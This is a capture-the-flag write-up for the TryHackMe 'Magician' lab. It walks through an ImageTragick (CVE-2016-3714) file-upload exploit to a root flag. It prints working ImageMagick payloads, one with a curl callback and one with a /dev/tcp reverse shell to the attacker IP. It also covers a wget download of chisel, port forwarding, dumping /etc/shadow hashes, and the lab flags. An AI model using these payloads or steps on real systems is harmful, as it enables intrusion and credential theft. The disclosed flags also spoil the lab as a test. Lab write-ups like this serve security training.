Magician (ImageTragick, Port Forwarding)

First, we need to enumerate using nmap.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/magician  
╰─➤  nmap -A 10.10.208.142 | tee nmap.log
Starting Nmap 7.80 ( https://nmap.org ) at 2022-04-27 08:02 +0630
Nmap scan report for magician (10.10.208.142)
Host is up (0.28s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 2.0.8 or later
8081/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: magician
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 77.90 seconds

Port 21

When I connect to ftp with anonymous user, I got error.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/magician  
╰─➤  ftp magician 
Connected to magician.
220 THE MAGIC DOOR
Name (magician:hnl): anonymous
331 Please specify the password.
Password:

230-Huh? The door just opens after some time? You're quite the patient one, aren't ya, it's a thing called 'delay_successful_login' in /etc/vsftpd.conf ;) Since you're a rookie, this might help you to get started: https://imagetragick.com. You might need to do some little tweaks though...
230 Login successful.
ftp> 
ftp> ls
550 Permission denied.
ftp: bind: Address already in use

Port 8081

When you browse to http://magician:8081/, you will see this interface.

With burp, I can intercept the data when I upload custom png file.

The response said, I got successfully uploaded.

How about exploit.php?? Wow! I successfully uploaded.

Call back this url to get reverse shell. But I got error.

curl http://magician:8080/files/shell.php

This vulnerability come with CVE-2016-3714. You can read the full article at https://mukarramkhalid.com/imagemagick-imagetragick-exploit/. Here is exploit.png from https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Picture%20Image%20Magik/imagetragik1_payload_url_curl.png.

push graphic-context
viewbox 0 0 640 480
fill 'url(https://pre09.example.net/15bd/th/pre/f/2012/237/c/7/all_work_and_no_something/someting_by_nebezial-d5cdlor.jpg";curl "10.9.0.82)'
pop graphic-context

In this screenshot, we can see the exploit.png is working.

Let's upload a reverse shell. Here is a rce from https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Picture%20Image%20Magik/imagetragik1_payload_imageover_reverse_shell_devtcp.jpg

push graphic-context
encoding "UTF-8"
viewbox 0 0 1 1
affine 1 0 0 1 0 0
push graphic-context
image Over 0,0 1,1 '|/bin/sh -i > /dev/tcp/10.9.0.82/9001 0<&1 2>&1'
pop graphic-context
pop graphic-context

In netcat session, we got a revere shell.

User

Let's spawn a TTY shell.

sh-4.4$ /usr/bin/python -c 'import pty; pty.spawn("/bin/sh")'

Read the user flag.

sh-4.4$ cd 
cd l
sh-4.4$ s -al
ls -al
total 17204
drwxr-xr-x 5 magician magician     4096 Feb 13  2021 .
drwxr-xr-x 3 root     root         4096 Jan 30  2021 ..
lrwxrwxrwx 1 magician magician        9 Feb  6  2021 .bash_history -> /dev/null
-rw-r--r-- 1 magician magician      220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 magician magician     3771 Apr  4  2018 .bashrc
drwx------ 2 magician magician     4096 Jan 30  2021 .cache
drwx------ 3 magician magician     4096 Jan 30  2021 .gnupg
-rw-r--r-- 1 magician magician      807 Apr  4  2018 .profile
-rw-r--r-- 1 magician magician        0 Jan 30  2021 .sudo_as_admin_successful
-rw------- 1 magician magician     7546 Jan 31  2021 .viminfo
-rw-r--r-- 1 root     root     17565546 Jan 30  2021 spring-boot-magician-backend-0.0.1-SNAPSHOT.jar
-rw-r--r-- 1 magician magician      170 Feb 13  2021 the_magic_continues
drwxr-xr-x 2 root     root         4096 Feb  5  2021 uploads
-rw-r--r-- 1 magician magician       24 Jan 30  2021 user.txt
sh-4.4$ cat user.txt
cat user.txt
THM{simsalabim_hex_hex}

Root

You can see some opened port using netstat command.

sh-4.4$ netstat -antp
netstat -antp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 0.0.0.0:8081            0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:6666          0.0.0.0:*               LISTEN      -                   
tcp        0    299 10.10.210.247:41436     10.9.0.82:9001          ESTABLISHED 1374/sh             
tcp6       0      0 :::8080                 :::*                    LISTEN      951/java            
tcp6       0      0 :::21                   :::*                    LISTEN      -                   
tcp6       0      0 10.10.210.247:8080      10.9.0.82:54102         ESTABLISHED 951/java

Download chisel to forward port.

sh-4.4$ wget http://10.9.0.82:1234/chisel;chmod 777 chisel

Let's forward port.

# Server (listen at chisel server port 8000)
./chisel server -p 8000 --reverse

# Client
./chisel client 10.9.0.82:8000 R:9999:localhost:6666
(connect chisel server port 8000, bind our machine port with 9999, victim port 6666)

When you browse http://127.0.0.1:9999, you file see "Enter filename" input field. I put /etc/shadow.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/magician  
╰─➤  echo 'cm9vdDokNiROSGdnd2R1ZSQueUl2YS5iVzV0TXJZc3I1bWxUTi90cXdhZXdONXM4ZmtiUTlyRTdTeTBUVXRqeFNac21xSGIycUwvUjVtajdJdEtHeHdiT2JxUFBqV2wxbGFIVThlMDoxODY2MzowOjk5OTk5Ojc6OjoKZGFlbW9uOio6MTg0ODA6MDo5OTk5OTo3Ojo6CmJpbjoqOjE4NDgwOjA6OTk5OTk6Nzo6OgpzeXM6KjoxODQ4MDowOjk5OTk5Ojc6OjoKc3luYzoqOjE4NDgwOjA6OTk5OTk6Nzo6OgpnYW1lczoqOjE4NDgwOjA6OTk5OTk6Nzo6OgptYW46KjoxODQ4MDowOjk5OTk5Ojc6OjoKbHA6KjoxODQ4MDowOjk5OTk5Ojc6OjoKbWFpbDoqOjE4NDgwOjA6OTk5OTk6Nzo6OgpuZXdzOio6MTg0ODA6MDo5OTk5OTo3Ojo6CnV1Y3A6KjoxODQ4MDowOjk5OTk5Ojc6OjoKcHJveHk6KjoxODQ4MDowOjk5OTk5Ojc6OjoKd3d3LWRhdGE6KjoxODQ4MDowOjk5OTk5Ojc6OjoKYmFja3VwOio6MTg0ODA6MDo5OTk5OTo3Ojo6Cmxpc3Q6KjoxODQ4MDowOjk5OTk5Ojc6OjoKaXJjOio6MTg0ODA6MDo5OTk5OTo3Ojo6CmduYXRzOio6MTg0ODA6MDo5OTk5OTo3Ojo6Cm5vYm9keToqOjE4NDgwOjA6OTk5OTk6Nzo6OgpzeXN0ZW1kLW5ldHdvcms6KjoxODQ4MDowOjk5OTk5Ojc6OjoKc3lzdGVtZC1yZXNvbHZlOio6MTg0ODA6MDo5OTk5OTo3Ojo6CnN5c2xvZzoqOjE4NDgwOjA6OTk5OTk6Nzo6OgptZXNzYWdlYnVzOio6MTg0ODA6MDo5OTk5OTo3Ojo6Cl9hcHQ6KjoxODQ4MDowOjk5OTk5Ojc6OjoKbHhkOio6MTg0ODA6MDo5OTk5OTo3Ojo6CnV1aWRkOio6MTg0ODA6MDo5OTk5OTo3Ojo6CmRuc21hc3E6KjoxODQ4MDowOjk5OTk5Ojc6OjoKbGFuZHNjYXBlOio6MTg0ODA6MDo5OTk5OTo3Ojo6CnBvbGxpbmF0ZToqOjE4NDgwOjA6OTk5OTk6Nzo6Ogpzc2hkOio6MTg2NTc6MDo5OTk5OTo3Ojo6Cm1hZ2ljaWFuOiQ2JG5CSXpRMmpHL3dlOTFMMFokaVdhVS9nOFowSmdnTnk3VlJtUUVCMTVqZkFXVHN5ZEZqQk9CUThhTjVULzBib2JjeUFiUFI0Z3FVcHZBTktFWDJyUWJRbm5pYW9IU2xSNXdYT2Vrby46MTg2NTc6MDo5OTk5OTo3Ojo6CmZ0cDoqOjE4NjU3OjA6OTk5OTk6Nzo6Ogo=' | base64 -d
root:$6$NHggwdue$.yIva.bW5tMrYsr5mlTN/tqwaewN5s8fkbQ9rE7Sy0TUtjxSZsmqHb2qL/R5mj7ItKGxwbObqPPjWl1laHU8e0:18663:0:99999:7:::
daemon:*:18480:0:99999:7:::
bin:*:18480:0:99999:7:::
sys:*:18480:0:99999:7:::
sync:*:18480:0:99999:7:::
games:*:18480:0:99999:7:::
man:*:18480:0:99999:7:::
lp:*:18480:0:99999:7:::
mail:*:18480:0:99999:7:::
news:*:18480:0:99999:7:::
uucp:*:18480:0:99999:7:::
proxy:*:18480:0:99999:7:::
www-data:*:18480:0:99999:7:::
backup:*:18480:0:99999:7:::
list:*:18480:0:99999:7:::
irc:*:18480:0:99999:7:::
gnats:*:18480:0:99999:7:::
nobody:*:18480:0:99999:7:::
systemd-network:*:18480:0:99999:7:::
systemd-resolve:*:18480:0:99999:7:::
syslog:*:18480:0:99999:7:::
messagebus:*:18480:0:99999:7:::
_apt:*:18480:0:99999:7:::
lxd:*:18480:0:99999:7:::
uuidd:*:18480:0:99999:7:::
dnsmasq:*:18480:0:99999:7:::
landscape:*:18480:0:99999:7:::
pollinate:*:18480:0:99999:7:::
sshd:*:18657:0:99999:7:::
magician:$6$nBIzQ2jG/we91L0Z$iWaU/g8Z0JggNy7VRmQEB15jfAWTsydFjBOBQ8aN5T/0bobcyAbPR4gqUpvANKEX2rQbQnniaoHSlR5wXOeko.:18657:0:99999:7:::
ftp:*:18657:0:99999:7:::

Cracking root password is tricky. Reading root flag directly.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/magician  
╰─➤  echo 'VEhNe21hZ2ljX21heV9tYWtlX21hbnlfbWVuX21hZH0K' | base64 -d
THM{magic_may_make_many_men_mad}

PreviousCat Pictures (phpBB, Knockd, Docker)NextJason (Node.js Deserialization, npm)

Last updated 3 years ago

hashtagPort 21

hashtagPort 8081

hashtagUser

hashtagRoot

Port 21

Port 8081

User

Root